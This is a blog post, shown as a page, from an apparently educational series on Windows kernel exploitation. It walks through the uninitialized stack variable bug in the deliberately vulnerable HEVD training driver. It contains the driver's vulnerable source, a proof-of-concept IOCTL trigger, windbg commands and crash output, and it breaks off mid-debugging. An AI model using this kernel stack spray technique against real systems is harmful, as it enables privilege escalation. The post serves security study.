<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Windows-Kernel-Exploit-Study(3) | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00:这是HEVD系列中关于栈上变量未初始化的一种利用，在kernel的exploit中，这种情况很少发生，作为一个demo可以体会一下对于这种漏洞的Kernel stack spray的利用方式。在UAF的漏洞中，我们常常使用heap spray的方式去利用，然而Kernel stack spray差不多，不过是提前把数据”喷射”到内核栈，占据未初始化的变量的位置，如果是一个函数指针，那么我">
<meta name="keywords" content="exploit,windows kernel">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows-Kernel-Exploit-Study(3)">
<meta property="og:url" content="http:&#x2F;&#x2F;o0xmuhe.me&#x2F;2017&#x2F;02&#x2F;04&#x2F;Windows-Kernel-Exploit-Study-3&#x2F;index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="0x00:这是HEVD系列中关于栈上变量未初始化的一种利用，在kernel的exploit中，这种情况很少发生，作为一个demo可以体会一下对于这种漏洞的Kernel stack spray的利用方式。在UAF的漏洞中，我们常常使用heap spray的方式去利用，然而Kernel stack spray差不多，不过是提前把数据”喷射”到内核栈，占据未初始化的变量的位置，如果是一个函数指针，那么我">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2017-02-04T13:37:05.000Z">
<meta name="twitter:card" content="summary">
  
    <link rel="alternative" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">muhe</a></h1>
        </hgroup>

        
        <p class="header-subtitle">control $pc, control the world</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                            <li><a href="/frinds">友情链接</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/Pwnable-Log">Pwnable</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                            
                                <a class="fl weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                            
                                <a class="fl twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                            
                                <a class="fl rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/1day/" style="font-size: 10px;">1day</a> <a href="/tags/Adobe/" style="font-size: 11.43px;">Adobe</a> <a href="/tags/Adobe-Acrobat-Reader/" style="font-size: 10px;">Adobe Acrobat Reader</a> <a href="/tags/Adobe-Reader/" style="font-size: 11.43px;">Adobe Reader</a> <a href="/tags/Antlr/" style="font-size: 10px;">Antlr</a> <a href="/tags/Apple/" style="font-size: 10px;">Apple</a> <a href="/tags/Bindiff/" style="font-size: 10px;">Bindiff</a> <a href="/tags/C/" style="font-size: 11.43px;">C</a> <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/CTF-Writeup/" style="font-size: 10px;">CTF Writeup</a> <a href="/tags/CVE/" style="font-size: 10px;">CVE</a> <a href="/tags/Compilers/" style="font-size: 10px;">Compilers</a> <a href="/tags/ESXi/" style="font-size: 10px;">ESXi</a> <a href="/tags/Frida/" style="font-size: 10px;">Frida</a> <a href="/tags/IDA/" style="font-size: 12.86px;">IDA</a> <a href="/tags/IPC/" style="font-size: 11.43px;">IPC</a> <a href="/tags/LLVM/" style="font-size: 10px;">LLVM</a> <a href="/tags/Linux/" style="font-size: 12.86px;">Linux</a> <a href="/tags/MacOS/" style="font-size: 11.43px;">MacOS</a> <a href="/tags/Mach/" style="font-size: 10px;">Mach</a> <a href="/tags/PANDA/" style="font-size: 10px;">PANDA</a> <a href="/tags/PoC/" style="font-size: 11.43px;">PoC</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/RE/" style="font-size: 10px;">RE</a> <a href="/tags/Snell/" style="font-size: 10px;">Snell</a> <a href="/tags/Study/" style="font-size: 15.71px;">Study</a> <a href="/tags/Surge/" style="font-size: 10px;">Surge</a> <a href="/tags/Symbolic-Execution/" style="font-size: 10px;">Symbolic Execution</a> <a href="/tags/Tools/" style="font-size: 11.43px;">Tools</a> <a href="/tags/UaF/" style="font-size: 10px;">UaF</a> <a href="/tags/Webkit/" style="font-size: 10px;">Webkit</a> <a href="/tags/android/" style="font-size: 10px;">android</a> <a href="/tags/angr/" style="font-size: 11.43px;">angr</a> <a href="/tags/compiler/" style="font-size: 10px;">compiler</a> <a href="/tags/ctf/" style="font-size: 18.57px;">ctf</a> <a href="/tags/ctf-writeup/" style="font-size: 20px;">ctf writeup</a> <a href="/tags/debug/" style="font-size: 10px;">debug</a> <a href="/tags/env-config/" style="font-size: 10px;">env config</a> <a href="/tags/exploit/" style="font-size: 15.71px;">exploit</a> <a href="/tags/frida/" style="font-size: 10px;">frida</a> <a href="/tags/fuzz/" style="font-size: 14.29px;">fuzz</a> <a href="/tags/gdb/" style="font-size: 10px;">gdb</a> <a href="/tags/glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/" style="font-size: 10px;">glibc内存管理</a> <a href="/tags/life/" style="font-size: 11.43px;">life</a> <a href="/tags/linux/" style="font-size: 10px;">linux</a> <a href="/tags/linux-kernel/" style="font-size: 12.86px;">linux kernel</a> <a href="/tags/macOS/" style="font-size: 17.14px;">macOS</a> <a href="/tags/mips/" style="font-size: 10px;">mips</a> <a href="/tags/paper/" style="font-size: 10px;">paper</a> <a href="/tags/peach/" style="font-size: 10px;">peach</a> <a href="/tags/pwn/" style="font-size: 15.71px;">pwn</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/ret-2-dl-resolve/" style="font-size: 10px;">ret 2 dl-resolve</a> <a href="/tags/study/" style="font-size: 12.86px;">study</a> <a href="/tags/tools/" style="font-size: 10px;">tools</a> <a href="/tags/uaf/" style="font-size: 10px;">uaf</a> <a href="/tags/unicorn-engine/" style="font-size: 10px;">unicorn engine</a> <a href="/tags/vuln-analysis/" style="font-size: 10px;">vuln analysis</a> <a href="/tags/wargame/" style="font-size: 11.43px;">wargame</a> <a href="/tags/webkit/" style="font-size: 12.86px;">webkit</a> <a href="/tags/winafl/" style="font-size: 10px;">winafl</a> <a href="/tags/windows-kernel/" style="font-size: 12.86px;">windows kernel</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/%E5%85%B6%E4%BB%96/" style="font-size: 10px;">其他</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%84%9F%E6%82%9F/" style="font-size: 10px;">感悟</a> <a href="/tags/%E6%84%9F%E6%83%B3/" style="font-size: 10px;">感想</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" style="font-size: 15.71px;">漏洞分析</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" style="font-size: 11.43px;">环境配置</a> <a href="/tags/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86/" style="font-size: 11.43px;">编译原理</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://syclover.sinaapp.com/">Syclover Team</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://weibo.com/u/5376172367">最爱的高老师</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.Ox9A82.com">0x9A82学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://k1n9.me/">K1n9师傅</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy">L3mon</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.xianyusec.com">咸鱼</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://rootclay.com">rootclay</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://v1ct0r.com/">V1ct0r</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://godot.win">Godot学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://hebic.me/">Homaebic学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://iqwq.me">两米的sco4x0</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://zmy.im/">JimmyZhou</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://silic.top/">灭亡叔叔</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://dwx.io">Jason</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="	http://www.0aa.me/">Mosuan</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://whereisk0shl.top">k0sh1</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://winter3un.github.io">WinterSun</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://venenof.com">Venenof</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://r0p.me/">Icemakr</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://bestwing.me/">Swing</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://www.hackfun.org/">4ido10n</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.hackersb.cn/">王松_Striker</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/7top/">7top</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.bendawang.site">bendawang</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://yixuankeer.win">前端joker大佬</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.lc4t.me">lc4t</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.inksec.cn/">Szrzvdny</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://sixwha1e.github.io/">漂亮的sixwhale小姐姐</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://ctfrank.org">CTF Rank</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://askook.me/">A酱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/idoge.cc">重庆五套房的小葱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/stone.moe">石头</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/pi4net.com">邢老师最优秀</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">二进制安全. Member of Syclover. CTFer/INTJ.</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">muhe</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">muhe</a></h1>
            </hgroup>
            
            <p class="header-subtitle">control $pc, control the world</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                    <li><a href="/frinds">友情链接</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/Pwnable-Log">Pwnable</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                    
                        <a class="twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-Windows-Kernel-Exploit-Study-3" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/02/04/Windows-Kernel-Exploit-Study-3/" class="article-date">
      <time datetime="2017-02-04T12:37:48.000Z" itemprop="datePublished">2017-02-04</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Windows-Kernel-Exploit-Study(3)
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/exploit/" rel="tag">exploit</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/windows-kernel/" rel="tag">windows kernel</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h4 id="0x00"><a href="#0x00" class="headerlink" title="0x00:"></a>0x00:</h4><p>这是HEVD系列中关于栈上变量未初始化的一种利用，在kernel的exploit中，这种情况很少发生，作为一个demo可以体会一下对于这种漏洞的<code>Kernel stack spray</code>的利用方式。在UAF的漏洞中，我们常常使用<code>heap spray</code>的方式去利用，然而<code>Kernel stack spray</code>差不多，不过是提前把数据”喷射”到内核栈，占据未初始化的变量的位置，如果是一个函数指针，那么我们就可以劫持这个函数，调用，去执行shellcode，从而完成提权。</p>
<a id="more"></a>

<pre><code>关于环境及工具：</code></pre><ul>
<li>windows7 cn x86</li>
<li>windbg</li>
<li>osrloader</li>
</ul>
<h4 id="0x01-先来看vuln代码"><a href="#0x01-先来看vuln代码" class="headerlink" title="0x01:先来看vuln代码"></a>0x01:先来看vuln代码</h4><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">VOID <span class="title">UninitializedStackVariableObjectCallback</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    PAGED_CODE();</span><br><span class="line"></span><br><span class="line">    DbgPrint(<span class="string">"[+] Uninitialized Stack Variable Object Callback\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/// &lt;summary&gt;</span></span><br><span class="line"><span class="comment">/// Trigger the Uninitialized Stack Variable Vulnerability</span></span><br><span class="line"><span class="comment">/// &lt;/summary&gt;</span></span><br><span class="line"><span class="comment">/// &lt;param name="UserBuffer"&gt;The pointer to user mode buffer&lt;/param&gt;</span></span><br><span class="line"><span class="comment">/// &lt;returns&gt;NTSTATUS&lt;/returns&gt;</span></span><br><span class="line"><span class="function">NTSTATUS <span class="title">TriggerUninitializedStackVariable</span><span class="params">(IN PVOID UserBuffer)</span> </span>&#123;</span><br><span class="line">    ULONG UserValue = <span class="number">0</span>;</span><br><span class="line">    ULONG MagicValue = <span class="number">0xBAD0B0B0</span>;</span><br><span class="line">    NTSTATUS Status = STATUS_SUCCESS;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> SECURE</span></span><br><span class="line">    <span class="comment">// Secure Note: This is secure because the developer is properly initializing</span></span><br><span class="line">    <span class="comment">// UNINITIALIZED_STACK_VARIABLE to NULL and checks for NULL pointer before calling</span></span><br><span class="line">    <span class="comment">// the callback</span></span><br><span class="line">    UNINITIALIZED_STACK_VARIABLE UninitializedStackVariable = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span></span></span><br><span class="line">    <span class="comment">// Vulnerability Note: This is a vanilla Uninitialized Stack Variable vulnerability</span></span><br><span class="line">    <span class="comment">// because the developer is not initializing 'UNINITIALIZED_STACK_VARIABLE' structure</span></span><br><span class="line">    <span class="comment">// before calling the callback when 'MagicValue' does not match 'UserValue'</span></span><br><span class="line">    UNINITIALIZED_STACK_VARIABLE UninitializedStackVariable;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    PAGED_CODE();</span><br><span class="line"></span><br><span class="line">    __try &#123;</span><br><span class="line">        <span class="comment">// Verify if the buffer resides in user mode</span></span><br><span class="line">        ProbeForRead(UserBuffer,</span><br><span class="line">                     <span class="keyword">sizeof</span>(UNINITIALIZED_STACK_VARIABLE),</span><br><span class="line">                     (ULONG)__alignof(UNINITIALIZED_STACK_VARIABLE));</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Get the value from user mode</span></span><br><span class="line">        UserValue = *(PULONG)UserBuffer;</span><br><span class="line"></span><br><span class="line">        DbgPrint(<span class="string">"[+] UserValue: 0x%p\n"</span>, UserValue);</span><br><span class="line">        DbgPrint(<span class="string">"[+] UninitializedStackVariable Address: 0x%p\n"</span>, &amp;UninitializedStackVariable);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Validate the magic value</span></span><br><span class="line">        <span class="comment">// 如果我们传递的UserValue和这个MagicVule相同才会走这里。</span></span><br><span class="line">        <span class="keyword">if</span> (UserValue == MagicValue) &#123;</span><br><span class="line">            UninitializedStackVariable.Value = UserValue;</span><br><span class="line">            UninitializedStackVariable.Callback = &amp;UninitializedStackVariableObjectCallback;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        DbgPrint(<span class="string">"[+] UninitializedStackVariable.Value: 0x%p\n"</span>, UninitializedStackVariable.Value);</span><br><span class="line">        DbgPrint(<span class="string">"[+] UninitializedStackVariable.Callback: 0x%p\n"</span>, UninitializedStackVariable.Callback);</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifndef</span> SECURE</span></span><br><span class="line">        DbgPrint(<span class="string">"[+] Triggering Uninitialized Stack Variable Vulnerability\n"</span>);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// Call the callback function</span></span><br><span class="line">        <span class="comment">//如果前面UserValue和MageValue不一样的时候，callback没被赋值的，直接调用就会出问题。</span></span><br><span class="line">        <span class="keyword">if</span> (UninitializedStackVariable.Callback) &#123;</span><br><span class="line">            UninitializedStackVariable.Callback();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    __except (EXCEPTION_EXECUTE_HANDLER) &#123;</span><br><span class="line">        Status = GetExceptionCode();</span><br><span class="line">        DbgPrint(<span class="string">"[-] Exception Code: 0x%X\n"</span>, Status);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> Status;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们传递一个非<code>MagicValue</code>的值，<code>UninitializedStackVariable.Callback</code>就是一个未定的值，后面直接调用，就可能会直接崩溃。</p>
<h4 id="0x02-调试"><a href="#0x02-调试" class="headerlink" title="0x02:调试"></a>0x02:调试</h4><p>设置好win7 kernel调试相关的设置，挂载上驱动。<br>PoC代码如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function">HANDLE <span class="title">GetDeviceHandle</span><span class="params">(LPCSTR DeviceName)</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    HANDLE hDriver = CreateFileA(DeviceName,</span><br><span class="line">            GENERIC_READ | GENERIC_WRITE,</span><br><span class="line">            FILE_SHARE_READ | FILE_SHARE_WRITE,</span><br><span class="line">            <span class="literal">NULL</span>,</span><br><span class="line">            OPEN_EXISTING,</span><br><span class="line">            FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,</span><br><span class="line">            <span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">return</span> hDriver;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> _tmain(<span class="keyword">int</span> argc, _TCHAR* argv[]) &#123;</span><br><span class="line">    ULONG BytesReturned;</span><br><span class="line">    HANDLE hFile = <span class="literal">NULL</span>;</span><br><span class="line">    ULONG MagicValue = <span class="number">0xBAADF00D</span>;</span><br><span class="line">    LPCSTR lpDeviceName = (LPCSTR)<span class="string">"\\\\.\\HackSysExtremeVulnerableDriver"</span>;</span><br><span class="line"></span><br><span class="line">    __try &#123;</span><br><span class="line"></span><br><span class="line">        hFile = GetDeviceHandle(lpDeviceName);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"\t\t[-] Failed Getting Device Handle: 0x%X\n"</span>, GetLastError());</span><br><span class="line">            <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"\t\t[+] Device Handle: 0x%X\n"</span>, hFile);</span><br><span class="line">        &#125;</span><br><span class="line">        StackSprayBuffer = (PULONG)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,StackSprayBufferSize);</span><br><span class="line">        <span class="keyword">if</span>(!StackSprayBuffer)&#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"Alloc buffer error : 0x%X"</span>,GetLastError());</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        DeviceIoControl(hFile,</span><br><span class="line">                        HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE,</span><br><span class="line">                        (LPVOID)&amp;MagicValue,</span><br><span class="line">                        <span class="number">0</span>,</span><br><span class="line">                        <span class="literal">NULL</span>,</span><br><span class="line">                        <span class="number">0</span>,</span><br><span class="line">                        &amp;BytesReturned,</span><br><span class="line">                        <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">        HeapFree(GetProcessHeap(),<span class="number">0</span>,(LPVOID)StackSprayBuffer);</span><br><span class="line">        <span class="comment">//set ptr NULL</span></span><br><span class="line">        StackSprayBuffer = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    __except (EXCEPTION_EXECUTE_HANDLER) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"\t\t[-] Exception: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Windbg设置后</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!gflag +soe</span><br></pre></td></tr></table></figure>
<p>为了调试到触发vuln的部分的代码，采用的方式是结合IDA，查看函数的offset，结合HEVD模块的加载基地址，去下断点，断在有漏洞的函数那里。</p>
<p>之后捕获到crash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">kd&gt; !gflag +soe</span><br><span class="line">New NtGlobalFlag contents: 0x00000001</span><br><span class="line">    soe - Stop On Exception</span><br><span class="line">kd&gt; g</span><br><span class="line">Access violation - code c0000005 (first chance)</span><br><span class="line">First chance exceptions are reported before any exception handling.</span><br><span class="line">This exception may be expected and handled.</span><br><span class="line">00000000 ??              ???</span><br><span class="line">kd&gt; dps esp</span><br><span class="line">9adb9ab0  75abe00b</span><br><span class="line">9adb9ab4  8eff4f94*** ERROR: Module load completed but symbols could not be loaded for HEVD.sys</span><br><span class="line"> HEVD+0x4f94</span><br><span class="line">9adb9ab8  1424bcc8</span><br><span class="line">9adb9abc  87c86980</span><br><span class="line">9adb9ac0  87c869f0</span><br><span class="line">9adb9ac4  8eff5ca4 HEVD+0x5ca4</span><br><span class="line">9adb9ac8  83ec88c8 nt!MiExchangeWsle+0x7c</span><br><span class="line">9adb9acc  75abe005</span><br><span class="line">9adb9ad0  0000014f</span><br><span class="line">9adb9ad4  00000000 